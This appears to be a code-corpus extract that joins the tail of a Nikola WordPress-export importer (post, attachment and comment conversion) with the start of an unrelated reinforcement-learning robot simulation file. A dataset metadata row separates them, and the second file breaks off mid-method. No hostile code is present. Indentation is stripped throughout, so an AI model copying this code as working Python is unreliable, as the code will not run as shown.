if not install_plugin(self.site, 'wordpress_compiler', output_dir=os.path.join(self.output_folder, 'plugins')):
return False
else:
LOGGER.warn("Make sure to install the WordPress page compiler via")
LOGGER.warn(" nikola plugin -i wordpress_compiler")
LOGGER.warn("in your imported blog's folder ({0}), if you haven't installed it system-wide or user-wide. Otherwise, your newly imported blog won't compile.".format(self.output_folder))
@classmethod
def read_xml_file(cls, filename):
"""Read XML file into memory."""
xml = []
with open(filename, 'rb') as fd:
for line in fd:
# These explode etree and are useless
if b'<atom:link rel=' in line:
continue
xml.append(line)
return b''.join(xml)
@classmethod
def get_channel_from_file(cls, filename):
"""Get channel from XML file."""
tree = etree.fromstring(cls.read_xml_file(filename))
channel = tree.find('channel')
return channel
def populate_context(self, channel):
"""Populate context with config for the site."""
wordpress_namespace = channel.nsmap['wp']
context = SAMPLE_CONF.copy()
self.lang = get_text_tag(channel, 'language', 'en')[:2]
context['DEFAULT_LANG'] = self.lang
context['TRANSLATIONS_PATTERN'] = DEFAULT_TRANSLATIONS_PATTERN
context['BLOG_TITLE'] = get_text_tag(channel, 'title',
'PUT TITLE HERE')
context['BLOG_DESCRIPTION'] = get_text_tag(
channel, 'description', 'PUT DESCRIPTION HERE')
context['BASE_URL'] = get_text_tag(channel, 'link', '#')
if not context['BASE_URL']:
base_site_url = channel.find('{{{0}}}author'.format(wordpress_namespace))
context['BASE_URL'] = get_text_tag(base_site_url,
None,
"http://foo.com/")
if not context['BASE_URL'].endswith('/'):
context['BASE_URL'] += '/'
context['SITE_URL'] = context['BASE_URL']
author = channel.find('{{{0}}}author'.format(wordpress_namespace))
context['BLOG_EMAIL'] = get_text_tag(
author,
'{{{0}}}author_email'.format(wordpress_namespace),
"[email protected]")
context['BLOG_AUTHOR'] = get_text_tag(
author,
'{{{0}}}author_display_name'.format(wordpress_namespace),
"Joe Example")
extensions = ['rst', 'txt', 'md', 'html']
if self.use_wordpress_compiler:
extensions.append('wp')
POSTS = '(\n'
PAGES = '(\n'
for extension in extensions:
POSTS += ' ("posts/*.{0}", "posts", "post.tmpl"),\n'.format(extension)
PAGES += ' ("stories/*.{0}", "stories", "story.tmpl"),\n'.format(extension)
POSTS += ')\n'
PAGES += ')\n'
context['POSTS'] = POSTS
context['PAGES'] = PAGES
COMPILERS = '{\n'
COMPILERS += ''' "rest": ('.txt', '.rst'),''' + '\n'
COMPILERS += ''' "markdown": ('.md', '.mdown', '.markdown'),''' + '\n'
COMPILERS += ''' "html": ('.html', '.htm'),''' + '\n'
if self.use_wordpress_compiler:
COMPILERS += ''' "wordpress": ('.wp'),''' + '\n'
COMPILERS += '}'
context['COMPILERS'] = COMPILERS
return context
def download_url_content_to_file(self, url, dst_path):
"""Download some content (attachments) to a file."""
try:
request = requests.get(url, auth=self.auth)
if request.status_code >= 400:
LOGGER.warn("Downloading {0} to {1} failed with HTTP status code {2}".format(url, dst_path, request.status_code))
return
with open(dst_path, 'wb+') as fd:
fd.write(request.content)
except requests.exceptions.ConnectionError as err:
LOGGER.warn("Downloading {0} to {1} failed: {2}".format(url, dst_path, err))
def import_attachment(self, item, wordpress_namespace):
"""Import an attachment to the site."""
# Download main image
url = get_text_tag(
item, '{{{0}}}attachment_url'.format(wordpress_namespace), 'foo')
link = get_text_tag(item, '{{{0}}}link'.format(wordpress_namespace),
'foo')
path = urlparse(url).path
dst_path = os.path.join(*([self.output_folder, 'files'] + list(path.split('/'))))
if self.no_downloads:
LOGGER.info("Skipping downloading {0} => {1}".format(url, dst_path))
else:
dst_dir = os.path.dirname(dst_path)
utils.makedirs(dst_dir)
LOGGER.info("Downloading {0} => {1}".format(url, dst_path))
self.download_url_content_to_file(url, dst_path)
dst_url = '/'.join(dst_path.split(os.sep)[2:])
links[link] = '/' + dst_url
links[url] = '/' + dst_url
files = [path]
files_meta = [{}]
additional_metadata = item.findall('{{{0}}}postmeta'.format(wordpress_namespace))
if phpserialize and additional_metadata:
source_path = os.path.dirname(url)
for element in additional_metadata:
meta_key = element.find('{{{0}}}meta_key'.format(wordpress_namespace))
if meta_key is not None and meta_key.text == '_wp_attachment_metadata':
meta_value = element.find('{{{0}}}meta_value'.format(wordpress_namespace))
if meta_value is None:
continue
# Someone from Wordpress thought it was a good idea
# serialize PHP objects into that metadata field. Given
# that the export should give you the power to insert
# your blogging into another site or system its not.
# Why don't they just use JSON?
if sys.version_info[0] == 2:
try:
metadata = phpserialize.loads(utils.sys_encode(meta_value.text))
except ValueError:
# local encoding might be wrong sometimes
metadata = phpserialize.loads(meta_value.text.encode('utf-8'))
else:
metadata = phpserialize.loads(meta_value.text.encode('utf-8'))
meta_key = b'image_meta'
size_key = b'sizes'
file_key = b'file'
width_key = b'width'
height_key = b'height'
# Extract metadata
if width_key in metadata and height_key in metadata:
files_meta[0]['width'] = int(metadata[width_key])
files_meta[0]['height'] = int(metadata[height_key])
if meta_key in metadata:
image_meta = metadata[meta_key]
if not image_meta:
continue
dst_meta = {}
def add(our_key, wp_key, is_int=False, ignore_zero=False, is_float=False):
if wp_key in image_meta:
value = image_meta[wp_key]
if is_int:
value = int(value)
if ignore_zero and value == 0:
return
elif is_float:
value = float(value)
if ignore_zero and value == 0:
return
else:
value = value.decode('utf-8') # assume UTF-8
if value == '': # skip empty values
return
dst_meta[our_key] = value
add('aperture', b'aperture', is_float=True, ignore_zero=True)
add('credit', b'credit')
add('camera', b'camera')
add('caption', b'caption')
add('created_timestamp', b'created_timestamp', is_float=True, ignore_zero=True)
add('copyright', b'copyright')
add('focal_length', b'focal_length', is_float=True, ignore_zero=True)
add('iso', b'iso', is_float=True, ignore_zero=True)
add('shutter_speed', b'shutter_speed', ignore_zero=True, is_float=True)
add('title', b'title')
if len(dst_meta) > 0:
files_meta[0]['meta'] = dst_meta
# Find other sizes of image
if size_key not in metadata:
continue
for size in metadata[size_key]:
filename = metadata[size_key][size][file_key]
url = '/'.join([source_path, filename.decode('utf-8')])
# Construct metadata
meta = {}
meta['size'] = size.decode('utf-8')
if width_key in metadata[size_key][size] and height_key in metadata[size_key][size]:
meta['width'] = int(metadata[size_key][size][width_key])
meta['height'] = int(metadata[size_key][size][height_key])
path = urlparse(url).path
dst_path = os.path.join(*([self.output_folder, 'files'] + list(path.split('/'))))
if self.no_downloads:
LOGGER.info("Skipping downloading {0} => {1}".format(url, dst_path))
else:
dst_dir = os.path.dirname(dst_path)
utils.makedirs(dst_dir)
LOGGER.info("Downloading {0} => {1}".format(url, dst_path))
self.download_url_content_to_file(url, dst_path)
dst_url = '/'.join(dst_path.split(os.sep)[2:])
links[url] = '/' + dst_url
files.append(path)
files_meta.append(meta)
# Prepare result
result = {}
result['files'] = files
result['files_meta'] = files_meta
# Prepare extraction of more information
dc_namespace = item.nsmap['dc']
content_namespace = item.nsmap['content']
excerpt_namespace = item.nsmap['excerpt']
def add(result_key, key, namespace=None, filter=None, store_empty=False):
if namespace is not None:
value = get_text_tag(item, '{{{0}}}{1}'.format(namespace, key), None)
else:
value = get_text_tag(item, key, None)
if value is not None:
if filter:
value = filter(value)
if value or store_empty:
result[result_key] = value
add('title', 'title')
add('date_utc', 'post_date_gmt', namespace=wordpress_namespace)
add('wordpress_user_name', 'creator', namespace=dc_namespace)
add('content', 'encoded', namespace=content_namespace)
add('excerpt', 'encoded', namespace=excerpt_namespace)
add('description', 'description')
return result
code_re1 = re.compile(r'\[code.* lang.*?="(.*?)?".*\](.*?)\[/code\]', re.DOTALL | re.MULTILINE)
code_re2 = re.compile(r'\[sourcecode.* lang.*?="(.*?)?".*\](.*?)\[/sourcecode\]', re.DOTALL | re.MULTILINE)
code_re3 = re.compile(r'\[code.*?\](.*?)\[/code\]', re.DOTALL | re.MULTILINE)
code_re4 = re.compile(r'\[sourcecode.*?\](.*?)\[/sourcecode\]', re.DOTALL | re.MULTILINE)
def transform_code(self, content):
"""Transform code blocks."""
# https://en.support.wordpress.com/code/posting-source-code/. There are
# a ton of things not supported here. We only do a basic [code
# lang="x"] -> ```x translation, and remove quoted html entities (<,
# >, &, and ").
def replacement(m, c=content):
if len(m.groups()) == 1:
language = ''
code = m.group(0)
else:
language = m.group(1) or ''
code = m.group(2)
code = code.replace('&', '&')
code = code.replace('>', '>')
code = code.replace('<', '<')
code = code.replace('"', '"')
return '```{language}\n{code}\n```'.format(language=language, code=code)
content = self.code_re1.sub(replacement, content)
content = self.code_re2.sub(replacement, content)
content = self.code_re3.sub(replacement, content)
content = self.code_re4.sub(replacement, content)
return content
@staticmethod
def transform_caption(content, use_html=False):
"""Transform captions."""
new_caption = re.sub(r'\[/caption\]', '</h1>' if use_html else '', content)
new_caption = re.sub(r'\[caption.*\]', '<h1>' if use_html else '', new_caption)
return new_caption
def transform_multiple_newlines(self, content):
"""Replace multiple newlines with only two."""
if self.squash_newlines:
return re.sub(r'\n{3,}', r'\n\n', content)
else:
return content
def transform_content(self, content, post_format, attachments):
"""Transform content into appropriate format."""
if post_format == 'wp':
if self.transform_to_html:
additional_data = {}
if attachments is not None:
additional_data['attachments'] = attachments
try:
content = self.wordpress_page_compiler.compile_to_string(content, additional_data=additional_data)
except TypeError: # old versions of the plugin don't support the additional argument
content = self.wordpress_page_compiler.compile_to_string(content)
return content, 'html', True
elif self.transform_to_markdown:
# First convert to HTML with WordPress plugin
additional_data = {}
if attachments is not None:
additional_data['attachments'] = attachments
try:
content = self.wordpress_page_compiler.compile_to_string(content, additional_data=additional_data)
except TypeError: # old versions of the plugin don't support the additional argument
content = self.wordpress_page_compiler.compile_to_string(content)
# Now convert to MarkDown with html2text
h = html2text.HTML2Text()
content = h.handle(content)
return content, 'md', False
elif self.html2text:
# TODO: what to do with [code] blocks?
# content = self.transform_code(content)
content = self.transform_caption(content, use_html=True)
h = html2text.HTML2Text()
content = h.handle(content)
return content, 'md', False
elif self.use_wordpress_compiler:
return content, 'wp', False
else:
content = self.transform_code(content)
content = self.transform_caption(content)
content = self.transform_multiple_newlines(content)
return content, 'md', True
elif post_format == 'markdown':
return content, 'md', True
elif post_format == 'none':
return content, 'html', True
else:
return None
def _extract_comment(self, comment, wordpress_namespace):
"""Extract comment from dump."""
id = int(get_text_tag(comment, "{{{0}}}comment_id".format(wordpress_namespace), None))
author = get_text_tag(comment, "{{{0}}}comment_author".format(wordpress_namespace), None)
author_email = get_text_tag(comment, "{{{0}}}comment_author_email".format(wordpress_namespace), None)
author_url = get_text_tag(comment, "{{{0}}}comment_author_url".format(wordpress_namespace), None)
author_IP = get_text_tag(comment, "{{{0}}}comment_author_IP".format(wordpress_namespace), None)
# date = get_text_tag(comment, "{{{0}}}comment_date".format(wordpress_namespace), None)
date_gmt = get_text_tag(comment, "{{{0}}}comment_date_gmt".format(wordpress_namespace), None)
content = get_text_tag(comment, "{{{0}}}comment_content".format(wordpress_namespace), None)
approved = get_text_tag(comment, "{{{0}}}comment_approved".format(wordpress_namespace), '0')
if approved == '0':
approved = 'hold'
elif approved == '1':
approved = 'approved'
elif approved == 'spam' or approved == 'trash':
pass
else:
LOGGER.warn("Unknown comment approved status: {0}".format(approved))
parent = int(get_text_tag(comment, "{{{0}}}comment_parent".format(wordpress_namespace), 0))
if parent == 0:
parent = None
user_id = int(get_text_tag(comment, "{{{0}}}comment_user_id".format(wordpress_namespace), 0))
if user_id == 0:
user_id = None
if approved == 'trash' or approved == 'spam':
return None
return {"id": id, "status": str(approved), "approved": approved == "approved",
"author": author, "email": author_email, "url": author_url, "ip": author_IP,
"date": date_gmt, "content": content, "parent": parent, "user_id": user_id}
def _write_comment(self, filename, comment):
"""Write comment to file."""
def write_header_line(fd, header_field, header_content):
"""Write comment header line."""
if header_content is None:
return
header_content = unicode_str(header_content).replace('\n', ' ')
line = '.. ' + header_field + ': ' + header_content + '\n'
fd.write(line.encode('utf8'))
with open(filename, "wb+") as fd:
write_header_line(fd, "id", comment["id"])
write_header_line(fd, "status", comment["status"])
write_header_line(fd, "approved", comment["approved"])
write_header_line(fd, "author", comment["author"])
write_header_line(fd, "author_email", comment["email"])
write_header_line(fd, "author_url", comment["url"])
write_header_line(fd, "author_IP", comment["ip"])
write_header_line(fd, "date_utc", comment["date"])
write_header_line(fd, "parent_id", comment["parent"])
write_header_line(fd, "wordpress_user_id", comment["user_id"])
fd.write(('\n' + comment['content']).encode('utf8'))
def _create_metadata(self, status, excerpt, tags, categories, post_name=None):
"""Create post metadata."""
other_meta = {'wp-status': status}
if excerpt is not None:
other_meta['excerpt'] = excerpt
if self.export_categories_as_categories:
cats = []
for text in categories:
if text in self._category_paths:
cats.append(self._category_paths[text])
else:
cats.append(utils.join_hierarchical_category_path([text]))
other_meta['categories'] = ','.join(cats)
if len(cats) > 0:
other_meta['category'] = cats[0]
if len(cats) > 1:
LOGGER.warn(('Post "{0}" has more than one category! ' +
'Will only use the first one.').format(post_name))
tags_cats = tags
else:
tags_cats = tags + categories
return tags_cats, other_meta
_tag_sanitize_map = {True: {}, False: {}}
def _sanitize(self, tag, is_category):
if self.tag_saniziting_strategy == 'lower':
return tag.lower()
if tag.lower() not in self._tag_sanitize_map[is_category]:
self._tag_sanitize_map[is_category][tag.lower()] = [tag]
return tag
previous = self._tag_sanitize_map[is_category][tag.lower()]
if self.tag_saniziting_strategy == 'first':
if tag != previous[0]:
LOGGER.warn("Changing spelling of {0} name '{1}' to {2}.".format('category' if is_category else 'tag', tag, previous[0]))
return previous[0]
else:
LOGGER.error("Unknown tag sanitizing strategy '{0}'!".format(self.tag_saniziting_strategy))
sys.exit(1)
return tag
def import_postpage_item(self, item, wordpress_namespace, out_folder=None, attachments=None):
"""Take an item from the feed and creates a post file."""
if out_folder is None:
out_folder = 'posts'
title = get_text_tag(item, 'title', 'NO TITLE')
# titles can have line breaks in them, particularly when they are
# created by third-party tools that post to Wordpress.
# Handle windows-style and unix-style line endings.
title = title.replace('\r\n', ' ').replace('\n', ' ')
# link is something like http://foo.com/2012/09/01/hello-world/
# So, take the path, utils.slugify it, and that's our slug
link = get_text_tag(item, 'link', None)
parsed = urlparse(link)
path = unquote(parsed.path.strip('/'))
try:
if isinstance(path, utils.bytes_str):
path = path.decode('utf8', 'replace')
else:
path = path
except AttributeError:
pass
# Cut out the base directory.
if path.startswith(self.base_dir.strip('/')):
path = path.replace(self.base_dir.strip('/'), '', 1)
pathlist = path.split('/')
if parsed.query: # if there are no nice URLs and query strings are used
out_folder = os.path.join(*([out_folder] + pathlist))
slug = get_text_tag(
item, '{{{0}}}post_name'.format(wordpress_namespace), None)
if not slug: # it *may* happen
slug = get_text_tag(
item, '{{{0}}}post_id'.format(wordpress_namespace), None)
if not slug: # should never happen
LOGGER.error("Error converting post:", title)
return False
else:
if len(pathlist) > 1:
out_folder = os.path.join(*([out_folder] + pathlist[:-1]))
slug = utils.slugify(pathlist[-1], self.lang)
description = get_text_tag(item, 'description', '')
post_date = get_text_tag(
item, '{{{0}}}post_date'.format(wordpress_namespace), None)
try:
dt = utils.to_datetime(post_date)
except ValueError:
dt = datetime.datetime(1970, 1, 1, 0, 0, 0)
LOGGER.error('Malformed date "{0}" in "{1}" [{2}], assuming 1970-01-01 00:00:00 instead.'.format(post_date, title, slug))
post_date = dt.strftime('%Y-%m-%d %H:%M:%S')
if dt.tzinfo and self.timezone is None:
self.timezone = utils.get_tzname(dt)
status = get_text_tag(
item, '{{{0}}}status'.format(wordpress_namespace), 'publish')
content = get_text_tag(
item, '{http://purl.org/rss/1.0/modules/content/}encoded', '')
excerpt = get_text_tag(
item, '{http://wordpress.org/export/1.2/excerpt/}encoded', None)
if excerpt is not None:
if len(excerpt) == 0:
excerpt = None
tags = []
categories = []
if status == 'trash':
LOGGER.warn('Trashed post "{0}" will not be imported.'.format(title))
return False
elif status == 'private':
tags.append('private')
is_draft = False
is_private = True
elif status != 'publish':
tags.append('draft')
is_draft = True
is_private = False
else:
is_draft = False
is_private = False
for tag in item.findall('category'):
text = tag.text
type = 'category'
if 'domain' in tag.attrib:
type = tag.attrib['domain']
if text == 'Uncategorized' and type == 'category':
continue
if type == 'category':
categories.append(text)
else:
tags.append(text)
if '$latex' in content:
tags.append('mathjax')
for i, cat in enumerate(categories[:]):
cat = self._sanitize(cat, True)
categories[i] = cat
self.all_tags.add(cat)
for i, tag in enumerate(tags[:]):
tag = self._sanitize(tag, False)
tags[i] = tag
self.all_tags.add(tag)
# Find post format if it's there
post_format = 'wp'
format_tag = [x for x in item.findall('*//{%s}meta_key' % wordpress_namespace) if x.text == '_tc_post_format']
if format_tag:
post_format = format_tag[0].getparent().find('{%s}meta_value' % wordpress_namespace).text
if post_format == 'wpautop':
post_format = 'wp'
if is_draft and self.exclude_drafts:
LOGGER.notice('Draft "{0}" will not be imported.'.format(title))
return False
elif is_private and self.exclude_privates:
LOGGER.notice('Private post "{0}" will not be imported.'.format(title))
return False
elif content.strip() or self.import_empty_items:
# If no content is found, no files are written.
self.url_map[link] = (self.context['SITE_URL'] +
out_folder.rstrip('/') + '/' + slug +
'.html').replace(os.sep, '/')
if hasattr(self, "separate_qtranslate_content") \
and self.separate_qtranslate_content:
content_translations = separate_qtranslate_content(content)
else:
content_translations = {"": content}
default_language = self.context["DEFAULT_LANG"]
for lang, content in content_translations.items():
try:
content, extension, rewrite_html = self.transform_content(content, post_format, attachments)
except:
LOGGER.error(('Cannot interpret post "{0}" (language {1}) with post ' +
'format {2}!').format(os.path.join(out_folder, slug), lang, post_format))
return False
if lang:
out_meta_filename = slug + '.meta'
if lang == default_language:
out_content_filename = slug + '.' + extension
else:
out_content_filename \
= utils.get_translation_candidate(self.context,
slug + "." + extension, lang)
self.extra_languages.add(lang)
meta_slug = slug
else:
out_meta_filename = slug + '.meta'
out_content_filename = slug + '.' + extension
meta_slug = slug
tags, other_meta = self._create_metadata(status, excerpt, tags, categories,
post_name=os.path.join(out_folder, slug))
meta = {
"title": title,
"slug": meta_slug,
"date": post_date,
"description": description,
"tags": ','.join(tags),
}
meta.update(other_meta)
if self.onefile:
self.write_post(
os.path.join(self.output_folder,
out_folder, out_content_filename),
content,
meta,
self._get_compiler(),
rewrite_html)
else:
self.write_metadata(os.path.join(self.output_folder, out_folder,
out_meta_filename),
title, meta_slug, post_date, description, tags, **other_meta)
self.write_content(
os.path.join(self.output_folder,
out_folder, out_content_filename),
content,
rewrite_html)
if self.export_comments:
comments = []
for tag in item.findall('{{{0}}}comment'.format(wordpress_namespace)):
comment = self._extract_comment(tag, wordpress_namespace)
if comment is not None:
comments.append(comment)
for comment in comments:
comment_filename = "{0}.{1}.wpcomment".format(slug, comment['id'])
self._write_comment(os.path.join(self.output_folder, out_folder, comment_filename), comment)
return (out_folder, slug)
else:
LOGGER.warn(('Not going to import "{0}" because it seems to contain'
' no content.').format(title))
return False
def _extract_item_info(self, item):
"""Extract information about an item."""
# The namespace usually is something like:
# http://wordpress.org/export/1.2/
wordpress_namespace = item.nsmap['wp']
post_type = get_text_tag(
item, '{{{0}}}post_type'.format(wordpress_namespace), 'post')
post_id = int(get_text_tag(
item, '{{{0}}}post_id'.format(wordpress_namespace), "0"))
parent_id = get_text_tag(
item, '{{{0}}}post_parent'.format(wordpress_namespace), None)
return wordpress_namespace, post_type, post_id, parent_id
def process_item_if_attachment(self, item):
"""Process attachments."""
wordpress_namespace, post_type, post_id, parent_id = self._extract_item_info(item)
if post_type == 'attachment':
data = self.import_attachment(item, wordpress_namespace)
# If parent was found, store relation with imported files
if parent_id is not None and int(parent_id) != 0:
self.attachments[int(parent_id)][post_id] = data
else:
LOGGER.warn("Attachment #{0} ({1}) has no parent!".format(post_id, data['files']))
def write_attachments_info(self, path, attachments):
"""Write attachments info file."""
with io.open(path, "wb") as file:
file.write(json.dumps(attachments).encode('utf-8'))
def process_item_if_post_or_page(self, item):
"""Process posts and pages."""
wordpress_namespace, post_type, post_id, parent_id = self._extract_item_info(item)
if post_type != 'attachment':
# Get attachments for post
attachments = self.attachments.pop(post_id, None)
# Import item
if post_type == 'post':
out_folder_slug = self.import_postpage_item(item, wordpress_namespace, 'posts', attachments)
else:
out_folder_slug = self.import_postpage_item(item, wordpress_namespace, 'stories', attachments)
# Process attachment data
if attachments is not None:
# If post was exported, store data
if out_folder_slug:
destination = os.path.join(self.output_folder, out_folder_slug[0],
out_folder_slug[1] + ".attachments.json")
self.write_attachments_info(destination, attachments)
def import_posts(self, channel):
"""Import posts into the site."""
self.attachments = defaultdict(dict)
# First process attachments
for item in channel.findall('item'):
self.process_item_if_attachment(item)
# Next process posts
for item in channel.findall('item'):
self.process_item_if_post_or_page(item)
# Assign attachments to posts
for post_id in self.attachments:
LOGGER.warn(("Found attachments for post or page #{0}, but didn't find post or page. " +
"(Attachments: {1})").format(post_id, [e['files'][0] for e in self.attachments[post_id].values()]))
def get_text_tag(tag, name, default):
"""Get the text of an XML tag."""
if tag is None:
return default
t = tag.find(name)
if t is not None and t.text is not None:
return t.text
else:
return default
def separate_qtranslate_content(text):
"""Parse the content of a wordpress post or page and separate qtranslate languages.
qtranslate tags: <!--:LL-->blabla<!--:-->
"""
# TODO: uniformize qtranslate tags <!--/en--> => <!--:-->
qt_start = "<!--:"
qt_end = "-->"
qt_end_with_lang_len = 5
qt_chunks = text.split(qt_start)
content_by_lang = {}
common_txt_list = []
for c in qt_chunks:
if not c.strip():
continue
if c.startswith(qt_end):
# just after the end of a language specific section, there may
# be some piece of common text or tags, or just nothing
lang = "" # default language
c = c.lstrip(qt_end)
if not c:
continue
elif c[2:].startswith(qt_end):
# a language specific section (with language code at the begining)
lang = c[:2]
c = c[qt_end_with_lang_len:]
else:
# nowhere specific (maybe there is no language section in the
# currently parsed content)
lang = "" # default language
if not lang:
common_txt_list.append(c)
for l in content_by_lang.keys():
content_by_lang[l].append(c)
else:
content_by_lang[lang] = content_by_lang.get(lang, common_txt_list) + [c]
# in case there was no language specific section, just add the text
if common_txt_list and not content_by_lang:
content_by_lang[""] = common_txt_list
# Format back the list to simple text
for l in content_by_lang.keys():
content_by_lang[l] = " ".join(content_by_lang[l])
return content_by_lang
| mit | 5,451,225,839,017,826,000 | 43.760611 | 245 | 0.54728 | false |
jpedrorl/Robotics-AI | final/robbie.py | 1 | 10715 | import copy
import math
from time import time
# remote API script
REMOTE_API_OBJ = 'RemoteAPI'
REMOTE_API_FUNC = 'resetSimulation'
# robot constants
STUCK_MARGIN = 1e-2
STUCK_TIMEOUT = 10
FALL_HEIGHT = 7e-2
# robot joints names
TAIL_JOINT = "tailJoint"
LEG_TOP_JOINT = "robbieLegJoint1"
LEG_MIDDLE_JOINT = "robbieLegJoint2"
LEG_BOTTOM_JOINT = "robbieLegJoint3"
FOOT_TIP = "robbieFootTip"
FOOT_TARGET = "robbieFootTarget"
LEG_JOINT_SUFFIX = ["", "#0", "#1", "#2"]
# reward values
FORWARD_REWARD = 100 # reward for getting far
CONTINUOUS_REWARD = 0 # reward for having same speed as last frame
BACKWARDS_PENALTY = -100 # penalty for going backwards
ROTATION_PENALTY = -.25 # penalty for getting off track
STUCK_PENALTY = -10 # penalty for getting stuck
FALL_PENALTY = -20 # penalty for falling down
STOP_PENALTY = -10 # penalty for not moving
# state and action contants
STATES_DIM = 36
ACTIONS_DIM = 8
# action values
MAX_SPEED = 0.5 # max speed of feet
FRONT_MIN_LIMITS = [0, -2e-2, -1e-2] # min relative position of front feet
FRONT_MAX_LIMITS = [0, 2e-2, 2e-2] # max relative position of front feet
BACK_MIN_LIMITS = [0, -2e-2, -1e-2] # min relative position of back feet
BACK_MAX_LIMITS = [0, 2e-2, 2e-2] # max relative position of back feet
class Robbie(object):
def __init__(self, sim, name):
self.sim = sim # simulation environment
self.name = name # robot's name
self.handle = self.sim.get_handle(name) # robot's id handle
# last tick time
self.last_tick = time()
# id handles
self.foot_tips = []
self.foot_targets = []
self.robot_joints = []
# get handles of leg joints and foot summies
for suffix in LEG_JOINT_SUFFIX:
self.foot_tips += [self.sim.get_handle(FOOT_TIP + suffix)]
self.foot_targets += [self.sim.get_handle(FOOT_TARGET + suffix)]
self.robot_joints += [self.sim.get_handle(LEG_TOP_JOINT + suffix),
self.sim.get_handle(LEG_MIDDLE_JOINT + suffix),
self.sim.get_handle(LEG_BOTTOM_JOINT + suffix)]
# get handle for tail joint
self.robot_joints += [self.sim.get_handle(TAIL_JOINT)]
# declare pose, position and speed variables
self.position = [0] * 3
self.orientation = [0] * 3
self.tips_position = [0] * len(self.foot_tips)
self.tips_speed = [0] * (2 * len(self.foot_tips))
self.joints_position = [0] * len(self.foot_targets)
# relative positions
self.tips_rel_position = [0] * len(self.foot_tips)
self.init_rel_position = [0] * len(self.tips_rel_position)
self.max_positions = [0] * len(self.tips_rel_position)
self.min_positions = [0] * len(self.tips_rel_position)
# last frame variables
self.last_position = [0] * 3
self.last_orientation = [0] * 3
self.last_speed = [0] * len(self.tips_speed)
# stuck and fallen check variables
self.is_stuck = False
self.has_stopped = False
self.stuck_position = [0] * 3
self.stuck_time = 0
self.has_fallen = False
# initial update
self.pre_update()
## reset robot on the scene
def reset_robot(self):
# reset server through script
self.sim.execute_script(REMOTE_API_OBJ, REMOTE_API_FUNC)
self.sim.disconnect()
self.sim.connect()
# reset variables
self.last_speed = [0] * len(self.tips_speed)
self.is_stuck = False
self.has_stopped = False
self.stuck_position = [0] * 3
self.stuck_time = 0
# initial update
self.pre_update()
# first update to be run
def pre_update(self):
self.sim.update()
self.update_pose(True)
self.update_sensors(True)
self.sim.update()
self.update_pose(False)
self.update_sensors(False)
self.calculate_limits()
## main update
def update(self):
# get tick delta time
now_tick = time()
tick_time = now_tick - self.last_tick
self.last_tick = now_tick
# update robot feet position
self.move_feet(tick_time)
# update simulator after rotations
self.sim.update()
self.update_pose(False)
self.update_sensors(False)
self.check_stuck(tick_time)
self.check_fallen()
## update pose
def update_pose(self, first_time):
self.last_position = copy.copy(self.position)
self.last_orientation = copy.copy(self.orientation)
self.position = self.sim.get_position(self.handle, first_time)
self.orientation = self.sim.get_orientation(self.handle, first_time)
## update sensors
def update_sensors(self, first_time):
self.joints_position = [self.sim.get_joint_position(i, first_time) for i in self.robot_joints]
self.tips_position = [self.sim.get_position(i, first_time) for i in self.foot_tips]
self.tips_rel_position = [self.sim.get_position(i, first_time, True) for i in self.foot_targets]
## move robot feet targets
def move_feet(self, tick_time):
for i, foot_target in enumerate(self.foot_targets):
index = i * 2
tick_move = MAX_SPEED * tick_time
# calculate wanted values
target_delta = [0] * 3
target_delta[0] = 0
target_delta[1] = self.tips_speed[index] * tick_move
target_delta[2] = self.tips_speed[index + 1] * tick_move
# clamp values
new_rel_position = [a + b for a, b in zip(self.tips_rel_position[i], target_delta)]
for j, _ in enumerate(new_rel_position):
new_rel_position[j] = min(new_rel_position[j], self.max_positions[i][j])
new_rel_position[j] = max(new_rel_position[j], self.min_positions[i][j])
self.sim.set_position(foot_target, new_rel_position, True)
## return robot current state
def get_state(self):
state = []
for tip_position in self.tips_position:
relative_position = [a - b for a, b in zip(self.position, tip_position)]
state += relative_position # 12 states (4 feet tips position 3 axis)
state += self.tips_speed # 8 states (4 feet targets speed 2 axis)
state += self.joints_position # 13 states (passive joints position)
state += self.orientation # 3 states (robot orientation 3 axis)
return state # total: 36 states
## return current state reward
def get_reward(self):
# start with neutral reward
reward = 0
# get position and orientation diff
diff_position = [a - b for a, b in zip(self.position, self.last_position)]
diff_orientation = [a - b for a, b in zip(self.orientation, self.last_orientation)]
# calculate distance
distance = math.sqrt(math.pow(diff_position[0], 2) + math.pow(diff_position[1], 2))
# calculate diff angle
diff_angle = diff_orientation[2]
if diff_angle > math.pi:
diff_angle -= 2 * math.pi
elif diff_angle < -math.pi:
diff_angle += 2 * math.pi
diff_angle_deg = abs(diff_angle) * 180 / math.pi
# calculate direction
last_angle = self.last_orientation[2]
angle_vector = [-math.sin(last_angle), math.cos(last_angle), 0]
dot_product = angle_vector[0] * diff_position[0] + angle_vector[1] * diff_position[1]
direction = math.copysign(1, dot_product)
# calculate if targets have same speed than last frame
same_speeds = [math.copysign(1, a) == math.copysign(1, b) for a, b in zip(self.tips_speed, self.last_speed)]
# reward for getting far or penalty for going backwards
if direction == 1:
reward += distance * FORWARD_REWARD
else:
reward += distance * BACKWARDS_PENALTY
# penalty for getting off track
reward += diff_angle_deg * ROTATION_PENALTY
# reward for having same speed as last frame
for same_speed in same_speeds:
if same_speed:
reward += CONTINUOUS_REWARD
# penalty for getting stuck
if self.is_stuck:
reward += STUCK_PENALTY
# penalty for falling down
if self.has_fallen:
reward += FALL_PENALTY
# penalty for not moving
if self.has_stopped:
reward += STOP_PENALTY
return reward
## check if robot didn't move for some time
def check_stuck(self, tick_time):
is_close = True
for i in range(3):
diff_pos = abs(self.stuck_position[i] - self.position[i])
if diff_pos >= STUCK_MARGIN:
is_close = False
break
if is_close:
self.stuck_time += tick_time
self.has_stopped = True
self.is_stuck = self.stuck_time >= STUCK_TIMEOUT
else:
self.stuck_time = 0
self.stuck_position = self.position
self.has_stopped = False
self.is_stuck = False
## check if robot has fallen
def check_fallen(self):
self.has_fallen = self.position[2] < FALL_HEIGHT
## calculate min and max position for each foot
def calculate_limits(self):
self.init_rel_position = copy.copy(self.tips_rel_position)
for i, rel_position in enumerate(self.init_rel_position):
is_front_foot = (i % 2 == 0)
max_limit = FRONT_MAX_LIMITS if is_front_foot else BACK_MAX_LIMITS
min_limit = FRONT_MIN_LIMITS if is_front_foot else BACK_MIN_LIMITS
self.max_positions[i] = [a + b for a, b in zip(rel_position, max_limit)]
self.min_positions[i] = [a + b for a, b in zip(rel_position, min_limit)]
## exectute actions on robot
def act(self, actions):
# perform actions
self.last_speed = copy.copy(self.tips_speed)
for i, action in enumerate(actions):
self.tips_speed[i] = action * MAX_SPEED
# update robot on simulator
self.update()
# check if should finish
done = self.is_stuck or self.has_fallen
# return new state
